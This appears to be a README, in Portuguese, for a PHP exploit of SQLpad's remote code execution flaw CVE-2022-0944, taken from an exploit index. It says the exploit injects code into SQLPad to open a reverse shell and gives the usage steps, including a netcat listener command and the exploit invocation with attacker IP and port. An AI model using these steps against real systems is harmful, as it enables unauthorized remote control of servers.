Share
## https://sploitus.com/exploit?id=AE215765-D26B-5FF6-9745-47C49E258FD0
# SQLPad-RCE-Exploit-CVE-2022-0944
CVE-2022-0944 Remote Code Execution Exploit

# Funcionamento:

Este código PHP é projetado para explorar uma vulnerabilidade de Execução Remota de Código (RCE) no software SQLPad, relacionada à falha CVE-2022-0944. Ele funciona injetando um código malicioso na aplicação SQLPad, forçando-a a executar um comando de sistema que abre uma shell reversa – uma conexão que dá ao atacante controle remoto do sistema vulnerável.

# Pré-requisitos:
PHP CLI - (sudo apt-get install php-cli)

cURL (biblioteca PHP cURL) - (sudo apt-get install php-curl)

# Modo de uso: 
configuração do Listener no Atacante
Para capturar a conexão reversa, inicie o Netcat na máquina do atacante. (nc -lvnp 4444)

php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: A URL raiz do SQLPad vulnerável (ex.: http://target.com:3000).

<attacker_ip>: O endereço IP do atacante que escuta a conexão reversa (mesmo IP do Netcat).

<attacker_port>: A porta na qual o atacante está escutando (mesma porta usada no Netcat).

# Referencias:
A logica original do exploit foi baseada neste repositorio:
  https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944.git
Minha ideia aqui, foi entender a logica e reescrever em outra linguagem me desafiando a conseguir.

https://nvd.nist.gov/vuln/detail/CVE-2022-0944